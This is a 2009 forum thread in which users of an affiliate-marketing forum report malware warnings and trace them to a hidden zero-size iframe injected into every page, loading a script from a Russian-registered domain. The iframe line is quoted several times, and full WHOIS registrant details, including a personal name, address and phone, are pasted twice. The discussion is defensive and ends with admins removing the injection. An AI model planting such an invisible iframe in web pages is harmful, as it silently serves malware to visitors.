WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum

Go Back   WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum > Free Section > Shooting The Shit

Shooting The Shit Anything goes, seriously. Come meet and network with your peers, it's a fun way to take a break out of your busy day of posting at other boring forums.


Welcome to the WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact contact us.

Closed Thread
 
LinkBack Thread Tools Display Modes
Old 06-12-2009, 08:31 AM   #1 (permalink)
Click, Whirr.
 
zimok's Avatar
 
Join Date: Oct 2008
Location: Canada
Posts: 1,844
iTrader: 0 / 0%
zimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond repute
Orly Malware on WickedFire?



Got this from Chrome right now, legit?
__________________
If you don't think you have anything to be grateful for, you're not thinking.
zimok is offline  
Old 06-12-2009, 08:35 AM   #2 (permalink)
+
 
Maitiú's Avatar
 
Join Date: Dec 2008
Location: Ireland
Posts: 314
iTrader: 17 / 100%
Maitiú Maitiú Maitiú Maitiú Maitiú Maitiú Maitiú Maitiú Maitiú Maitiú Maitiú
I'm getting the same with Google Chrome.
__________________
Your bad vibe will drive away your tribe
Maitiú is offline  
Old 06-12-2009, 08:38 AM   #3 (permalink)
Junior Member
 
Join Date: Jun 2009
Posts: 4
iTrader: 0 / 0%
Hyasynth has a spectacular aura about
I'm getting the same on Safari 4

http://www.wickedfire.com/suggestion...-new-post.html
Hyasynth is offline  
Old 06-12-2009, 08:41 AM   #4 (permalink)
Junior Member
 
Join Date: Jun 2009
Posts: 4
iTrader: 0 / 0%
Hyasynth has a spectacular aura about
I'm getting the same in Safari 4

Hyasynth is offline  
Old 06-12-2009, 08:47 AM   #5 (permalink)
Member
 
Join Date: Jan 2008
Posts: 66
iTrader: 2 / 100%
Lenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond reputeLenny has a reputation beyond repute
Code:
<iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe>
Lenny is offline  
Old 06-12-2009, 08:48 AM   #6 (permalink)
Senior Member
 
Spades's Avatar
 
Join Date: Mar 2007
Location: Florida
Posts: 616
iTrader: 0 / 0%
Spades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond repute
Same... with Avast:

__________________

Spades is offline  
Old 06-12-2009, 08:57 AM   #7 (permalink)
sudo make money
 
evo190's Avatar
 
Join Date: May 2009
Location: Shitbridge NJ
Posts: 296
iTrader: 0 / 0%
evo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond reputeevo190 has a reputation beyond repute
Norton just blocked:

HTTP malicious javascript encoder

attacking computer: naemnitibo.in (200.63.45.34)

attacker url: naemnitibo.in/cn.php?hyc

tried to attack me on port 57707
evo190 is offline  
Old 06-12-2009, 09:11 AM   #8 (permalink)
Click, Whirr.
 
zimok's Avatar
 
Join Date: Oct 2008
Location: Canada
Posts: 1,844
iTrader: 0 / 0%
zimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond repute
If anyone has a mods phone # or Jon's phone, call him and tell them to remove the rogue iframe. Every hour is money in the hands of the crooks.
__________________
If you don't think you have anything to be grateful for, you're not thinking.
zimok is offline  
Old 06-12-2009, 09:19 AM   #9 (permalink)
Senior Member
 
CygnusX's Avatar
 
Join Date: Mar 2007
Posts: 639
iTrader: 6 / 100%
CygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond reputeCygnusX has a reputation beyond repute
My Trend Micro Antivirus is detecting this too. I hope Jon can get it fixed asap.
CygnusX is offline  
Old 06-12-2009, 09:45 AM   #10 (permalink)
Senior Member
 
Spades's Avatar
 
Join Date: Mar 2007
Location: Florida
Posts: 616
iTrader: 0 / 0%
Spades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond repute
Found it...
Code:
<pre class="alt2" dir="ltr" style="
        margin: 0px;
        padding: 6px;
        border: 1px inset;
        width: 640px;
        height: 34px;
        text-align: left;
        overflow: auto">&lt;iframe src=&quot;http://naemnitibo.in/cn.php?hyc&quot; width=&quot;0&quot; height=&quot;0&quot;&gt;&lt;/iframe&gt;</pre>
Here's the domain info for this stupid fuck. Obviously it's anonymous but I'm hoping Shady will show up soon and dig a little deeper than I can.

Domain Name:NAEMNITIBO.IN
Created On:18-May-2009 15:34:44 UTC
Last Updated On:18-May-2009 15:37:31 UTC
Expiration Date:18-May-2010 15:34:44 UTC
Sponsoring Registrar:Web Commerce Communications Limited dba WebNic.cc (R105-AFIN)
Status:TRANSFER PROHIBITED
Registrant ID:WN13571799T
Registrant Name:Alexander Kalinin
Registrant Organization:Private person
Registrant Street1:ulitsa Dolskaya d.10 kv.33
Registrant Street2:
Registrant Street3:
Registrant City:Moskva
Registrant State/Province:Moskva
Registrant Postal Code:115569
Registrant Country:RU
Registrant Phone:+7.49573431510
Registrant Phone Ext.:
Registrant FAX:+0.0
Registrant FAX Ext.:
Registrant Email:[email protected]
Admin ID:WN13571800T
Admin Name:Alexander Kalinin
Admin Organization:Private person
Admin Street1:ulitsa Dolskaya d.10 kv.33
Admin Street2:
Admin Street3:
Admin City:Moskva
Admin State/Province:Moskva
Admin Postal Code:115569
Admin Country:RU
Admin Phone:+7.49573431510
Admin Phone Ext.:
Admin FAX:+0.0
Admin FAX Ext.:
Admin Email:[email protected]
Tech ID:WN13571801T
Tech Name:Alexander Kalinin
Tech Organization:Private person
Tech Street1:ulitsa Dolskaya d.10 kv.33
Tech Street2:
Tech Street3:
Tech City:Moskva
Tech State/Province:Moskva
Tech Postal Code:115569
Tech Country:RU
Tech Phone:+7.49573431510
Tech Phone Ext.:
Tech FAX:+0.0
Tech FAX Ext.:
Tech Email:[email protected]
Name Server:NS1.NAEMNITIBO.IN
Name Server:NS2.NAEMNITIBO.IN
__________________

Spades is offline  
Old 06-12-2009, 09:58 AM   #11 (permalink)
Senior Member
 
Join Date: Jan 2009
Location: The Internet
Posts: 210
iTrader: 0 / 0%
texic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond repute
Is anyone seeing anything in Firefox? No error here, wondering if it's just because the site is blocked by default.
texic is offline  
Old 06-12-2009, 10:03 AM   #12 (permalink)
Senior Member
 
Sticks79's Avatar
 
Join Date: Jun 2007
Posts: 3,530
iTrader: 5 / 100%
Sticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond reputeSticks79 has a reputation beyond repute
No problems here, WickedFire teh hacked eh!
__________________
Quote:
Any idea where all our helicopters are? It's Day 5 of Hurricane Katrina and thousands remain stranded in New Orleans and need to be airlifted. Where on earth could you have misplaced all our military choppers? Do you need help finding them? I once lost my car in a Sears parking lot. Man, was that a drag.

-Michael Moore, Sep 2, 2005
Sticks79 is offline  
Old 06-12-2009, 10:03 AM   #13 (permalink)
Senior Member
 
Spades's Avatar
 
Join Date: Mar 2007
Location: Florida
Posts: 616
iTrader: 0 / 0%
Spades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond repute
texic, do you have an AV installed? If not, you could easily be infected with whatever this guys pushing around. Download FREE antivirus software - avast! Home Edition
__________________

Spades is offline  
Old 06-12-2009, 10:08 AM   #14 (permalink)
Senior Member
 
smoosh's Avatar
 
Join Date: Nov 2007
Location: NYC
Posts: 146
iTrader: 0 / 0%
smoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond reputesmoosh has a reputation beyond repute
I will ping Jon or Stanley if no one's done it yet... and FF is not detecting any errors.
__________________
Whatever you do - do NOT milk the bull!
"Pickles of Thunder!" - still in development...
"Put some thunder in your pickle!" - Buy Viagra today!
Ebooks - virtual content guaranteed to make you a virtual billionaire....virtually...
smoosh is offline  
Old 06-12-2009, 10:10 AM   #15 (permalink)
Senior Member
 
Join Date: Jan 2009
Location: The Internet
Posts: 210
iTrader: 0 / 0%
texic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond reputetexic has a reputation beyond repute
I'm running Kaspersky and all my definitions are up to date. Seems that because Firefox blocks the site by default, nothing is ever run.
texic is offline  
Old 06-12-2009, 10:12 AM   #16 (permalink)
PedoBeard
 
kblessinggr's Avatar
 
Join Date: Sep 2008
Location: G.R., Michigan
Posts: 5,774
iTrader: 26 / 96%
kblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond repute
yea i'm getting it on every page of wf on safari 4, basically the embeded url got it flagged as a malware site by association.
kblessinggr is offline  
Old 06-12-2009, 10:15 AM   #17 (permalink)
Member
 
Join Date: May 2009
Posts: 36
iTrader: 0 / 0%
mikeiavelli has a spectacular aura about
my girlfriend's sites got infected recently with something similar (was javascript, not iframes though)

i researched it and basically there is spyware out there that sits idol on people's home computers monitoring FTP ports and sending username/passwords whenever someone logs into an FTP... basic ftp connections aren't encrypted. it's better to use sftp. i cleaned her computer of everything, changed her passwords, and had her switch to sftp before I could get the code to stop popping up every night.

i don't know if that's the problem here, but just a suggestion. i searched for 2-3 days before i figured out that her problems weren't holes in her php scripts or server side stuff....
mikeiavelli is offline  
Old 06-12-2009, 10:16 AM   #18 (permalink)
Mоderatоr
 
knukk's Avatar
 
Join Date: Jul 2008
Posts: 705
iTrader: 1 / 100%
knukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond repute
Here's Google's diagnostic page about that website: Google Safe Browsing diagnostic page for naemnitibo.in
__________________
Quote:
Originally Posted by rbnj0904
keep your fucking ass shut!!
knukk is offline  
Old 06-12-2009, 10:17 AM   #19 (permalink)
Mоderatоr
 
knukk's Avatar
 
Join Date: Jul 2008
Posts: 705
iTrader: 1 / 100%
knukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond repute
Quote:
Originally Posted by texic View Post
I'm running Kaspersky and all my definitions are up to date. Seems that because Firefox blocks the site by default, nothing is ever run.
That's true. If you run Firefox it blocks accessing that website until you tell it to do otherwise.
__________________
Quote:
Originally Posted by rbnj0904
keep your fucking ass shut!!
knukk is offline  
Old 06-12-2009, 10:21 AM   #20 (permalink)
Support: +1(347) 417-5786
 
Red_Virus's Avatar
 
Join Date: Jun 2007
Posts: 2,260
iTrader: 731 / 100%
Red_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond reputeRed_Virus has a reputation beyond repute
I have AVG Internet Security & using Firefox and getting no errors ! is it fixed ?
__________________
Over 1400 reviews posted for my 100 Dofollow Social Bookmarking Service : $19/URL (3 sites only per social bookmarking account). - PM me for discounts on BULK orders.
Red_Virus is offline  
Old 06-12-2009, 10:23 AM   #21 (permalink)
Mоderatоr
 
knukk's Avatar
 
Join Date: Jul 2008
Posts: 705
iTrader: 1 / 100%
knukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond repute
Quote:
Originally Posted by Red_Virus View Post
I have AVG Internet Security & using Firefox and getting no errors ! is it fixed ?
No.

But Firefox has that website on automatic block, so it won't access it without your consent.
__________________
Quote:
Originally Posted by rbnj0904
keep your fucking ass shut!!
knukk is offline  
Old 06-12-2009, 10:25 AM   #22 (permalink)
PedoBeard
 
kblessinggr's Avatar
 
Join Date: Sep 2008
Location: G.R., Michigan
Posts: 5,774
iTrader: 26 / 96%
kblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond repute
Quote:
Originally Posted by knukk View Post
Here's Google's diagnostic page about that website: Google Safe Browsing diagnostic page for naemnitibo.in
Quote:
Site is listed as suspicious - visiting this web site may harm your computer.
A lot of hooha as being marked as suspicious. Shame its not a simple matter of putting naemnitibo.in into the hosts file to have it pointed to localhost (since the warnings are triggered by either name and ip)
kblessinggr is offline  
Old 06-12-2009, 10:26 AM   #23 (permalink)
PedoBeard
 
kblessinggr's Avatar
 
Join Date: Sep 2008
Location: G.R., Michigan
Posts: 5,774
iTrader: 26 / 96%
kblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond repute
You know, I honestly thought that WF got flagged due to makemoniesonline.com and people who keep thinking its malware... shame my expectations were a bust.
kblessinggr is offline  
Old 06-12-2009, 10:33 AM   #24 (permalink)
 
turbolapp's Avatar
 
Join Date: Aug 2007
Location: Houston, TexASS
Posts: 8,146
iTrader: 7 / 100%
turbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond repute
Quote:
Originally Posted by knukk View Post
No.

But Firefox has that website on automatic block, so it won't access it without your consent.

I have AVG and am on FF as well so I don't see what you guys are talking about either. It requires an admin to fix anyways so I'm pretty useless here.
turbolapp is online now  
Old 06-12-2009, 10:41 AM   #25 (permalink)
Mоderatоr
 
knukk's Avatar
 
Join Date: Jul 2008
Posts: 705
iTrader: 1 / 100%
knukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond repute
Quote:
Originally Posted by turbolapp View Post
I have AVG and am on FF as well so I don't see what you guys are talking about either. It requires an admin to fix anyways so I'm pretty useless here.
Well, if you want to see for yourself you can go to http://naemnitibo.in. Firefox will block the access and give you the option to enter it if you'd like.

If you take a look into the source code of every page on Wickedfire now, you'll see that an iframe has been imprinted, which loads naemnitibo.in. Maybe it is a bug that has been exploited. The forums over at DevShed have also been attacked by this fuck (see this thread).
__________________
Quote:
Originally Posted by rbnj0904
keep your fucking ass shut!!
knukk is offline  
Old 06-12-2009, 10:56 AM   #26 (permalink)
PedoBeard
 
kblessinggr's Avatar
 
Join Date: Sep 2008
Location: G.R., Michigan
Posts: 5,774
iTrader: 26 / 96%
kblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond reputekblessinggr has a reputation beyond repute
Quote:
Originally Posted by knukk View Post
Well, if you want to see for yourself you can go to http://naemnitibo.in. Firefox will block the access and give you the option to enter it if you'd like.

If you take a look into the source code of every page on Wickedfire now, you'll see that an iframe has been imprinted, which loads naemnitibo.in. Maybe it is a bug that has been exploited. The forums over at DevShed have also been attacked by this fuck (see this thread).

If it's an iframe, firefox has the warning shown within the iframe itself, as opposed to the parent frame.
kblessinggr is offline  
Old 06-12-2009, 11:04 AM   #27 (permalink)
Senior Member
 
invisible777's Avatar
 
Join Date: Jul 2007
Posts: 1,318
iTrader: 2 / 100%
invisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond reputeinvisible777 has a reputation beyond repute
Wow, thank god for Firefox.

This iframing douchebag needs to be hung by his balls.
invisible777 is offline  
Old 06-12-2009, 11:08 AM   #28 (permalink)
Senior Member
 
Join Date: Jan 2009
Location: Internetz
Posts: 321
iTrader: 62 / 100%
amfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond reputeamfire has a reputation beyond repute
working fine with FF. do not see any warning.
amfire is offline  
Old 06-12-2009, 11:11 AM   #29 (permalink)
#1 Soccer Hater
 
Rage9's Avatar
 
Join Date: Jan 2008
Posts: 4,926
iTrader: 13 / 93%
Rage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond reputeRage9 has a reputation beyond repute
I didn't see any warning in Firefox either.
Rage9 is offline  
Old 06-12-2009, 11:15 AM   #30 (permalink)
Mоderatоr
 
knukk's Avatar
 
Join Date: Jul 2008
Posts: 705
iTrader: 1 / 100%
knukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond reputeknukk has a reputation beyond repute
Quote:
Originally Posted by kblessinggr View Post
If it's an iframe, firefox has the warning shown within the iframe itself, as opposed to the parent frame.
Yes, that's why users of Firefox shouldn't worry even though they haven't seen any warning.
__________________
Quote:
Originally Posted by rbnj0904
keep your fucking ass shut!!
knukk is offline  
Old 06-12-2009, 11:55 AM   #31 (permalink)
Banned
 
Join Date: Jun 2007
Posts: 1,262
iTrader: 0 / 0%
Webferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond reputeWebferret has a reputation beyond repute
so the question is... what are we going to do to this fuck.

and 'novel' suggestions?
Webferret is offline  
Old 06-12-2009, 12:01 PM   #32 (permalink)
 
AdHustler's Avatar
 
Join Date: Aug 2007
Posts: 4,045
iTrader: 6 / 100%
AdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond reputeAdHustler has a reputation beyond repute
I'll let Jon know.
__________________
AdHustler.com - Every Day I'm Hustlin'
AdHustler is offline  
Old 06-12-2009, 12:16 PM   #33 (permalink)
IM Phoenix. Burn baby
 
puroz's Avatar
 
Join Date: Jun 2008
Posts: 250
iTrader: 15 / 100%
puroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond reputepuroz has a reputation beyond repute
firefox + noscript + ubuntu = lolz @ virus
__________________
puroz is offline  
Old 06-12-2009, 01:18 PM   #34 (permalink)
 
Brandon's Avatar
 
Join Date: Jun 2006
Posts: 698
iTrader: 7 / 100%
Brandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond repute
Stanley took care of it. Thx for letting us know.
__________________
"Let me tell you what Melba Toast is packin' right here, all right. We got 4:11 Positrac outback, 750 double pumper, Edelbrock intake, bored over 30, 11 to 1 pop-up pistons, turbo-jet 390 horsepower. We're talkin' some fuckin' muscle." - Wooderson
Brandon is offline  
Old 06-12-2009, 03:11 PM   #35 (permalink)
Click, Whirr.
 
zimok's Avatar
 
Join Date: Oct 2008
Location: Canada
Posts: 1,844
iTrader: 0 / 0%
zimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond repute
Quote:
Originally Posted by Brandon View Post
Stanley took care of it. Thx for letting us know.
No problem, I'll take a 5 minute video of turbolapp walking on her turbostation as my reward.



From this angle please, thanks
__________________
If you don't think you have anything to be grateful for, you're not thinking.
zimok is offline  
Old 06-12-2009, 03:17 PM   #36 (permalink)
 
turbolapp's Avatar
 
Join Date: Aug 2007
Location: Houston, TexASS
Posts: 8,146
iTrader: 7 / 100%
turbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond reputeturbolapp has a reputation beyond repute
^^Dude. That is so wrong.

My LCD screen is so much bigger than that.

Last edited by turbolapp; 06-12-2009 at 04:42 PM..
turbolapp is online now  
Old 06-12-2009, 03:21 PM   #37 (permalink)
 
Brandon's Avatar
 
Join Date: Jun 2006
Posts: 698
iTrader: 7 / 100%
Brandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond reputeBrandon has a reputation beyond repute
Hahahaha!

Quote:
Originally Posted by turbolapp View Post
^^Dude. That is so wrong.

My LCD screen is much so much bigger than that.
__________________
"Let me tell you what Melba Toast is packin' right here, all right. We got 4:11 Positrac outback, 750 double pumper, Edelbrock intake, bored over 30, 11 to 1 pop-up pistons, turbo-jet 390 horsepower. We're talkin' some fuckin' muscle." - Wooderson
Brandon is offline  
Old 06-12-2009, 04:15 PM   #38 (permalink)
Click, Whirr.
 
zimok's Avatar
 
Join Date: Oct 2008
Location: Canada
Posts: 1,844
iTrader: 0 / 0%
zimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond reputezimok has a reputation beyond repute
Quote:
Originally Posted by turbolapp View Post
^^Dude. That is so wrong.

My LCD screen is much so much bigger than that.
Anything else my princess?

__________________
If you don't think you have anything to be grateful for, you're not thinking.
zimok is offline  
Old 06-12-2009, 04:39 PM   #39 (permalink)
 
xmcp123's Avatar
 
Join Date: Sep 2007
Location: Not Louisiana
Posts: 3,915
iTrader: 3 / 100%
xmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond repute
Quote:
Originally Posted by Spades View Post
Found it...
Code:
<pre class="alt2" dir="ltr" style="
        margin: 0px;
        padding: 6px;
        border: 1px inset;
        width: 640px;
        height: 34px;
        text-align: left;
        overflow: auto">&lt;iframe src=&quot;http://naemnitibo.in/cn.php?hyc&quot; width=&quot;0&quot; height=&quot;0&quot;&gt;&lt;/iframe&gt;</pre>
Here's the domain info for this stupid fuck. Obviously it's anonymous but I'm hoping Shady will show up soon and dig a little deeper than I can.

Domain Name:NAEMNITIBO.IN
Created On:18-May-2009 15:34:44 UTC
Last Updated On:18-May-2009 15:37:31 UTC
Expiration Date:18-May-2010 15:34:44 UTC
Sponsoring Registrar:Web Commerce Communications Limited dba WebNic.cc (R105-AFIN)
Status:TRANSFER PROHIBITED
Registrant ID:WN13571799T
Registrant Name:Alexander Kalinin
Registrant Organization:Private person
Registrant Street1:ulitsa Dolskaya d.10 kv.33
Registrant Street2:
Registrant Street3:
Registrant City:Moskva
Registrant State/Province:Moskva
Registrant Postal Code:115569
Registrant Country:RU
Registrant Phone:+7.49573431510
Registrant Phone Ext.:
Registrant FAX:+0.0
Registrant FAX Ext.:
Registrant Email:[email protected]
Admin ID:WN13571800T
Admin Name:Alexander Kalinin
Admin Organization:Private person
Admin Street1:ulitsa Dolskaya d.10 kv.33
Admin Street2:
Admin Street3:
Admin City:Moskva
Admin State/Province:Moskva
Admin Postal Code:115569
Admin Country:RU
Admin Phone:+7.49573431510
Admin Phone Ext.:
Admin FAX:+0.0
Admin FAX Ext.:
Admin Email:[email protected]
Tech ID:WN13571801T
Tech Name:Alexander Kalinin
Tech Organization:Private person
Tech Street1:ulitsa Dolskaya d.10 kv.33
Tech Street2:
Tech Street3:
Tech City:Moskva
Tech State/Province:Moskva
Tech Postal Code:115569
Tech Country:RU
Tech Phone:+7.49573431510
Tech Phone Ext.:
Tech FAX:+0.0
Tech FAX Ext.:
Tech Email:[email protected]
Name Server:NS1.NAEMNITIBO.IN
Name Server:NS2.NAEMNITIBO.IN
No matter which way you cut it, the trail goes dead somewhere in Russia. Impossible to verify who's real.
The place is a bulletproof hosting provider.
The only other trail I could see goes to the UK, but the name is "Oleg Orlov"...some human rights politician in Russia. So it's probably just them fucking around.
I could get a little deeper in, but honestly it's a pain in the ass since I can't just visit the URLs.
__________________
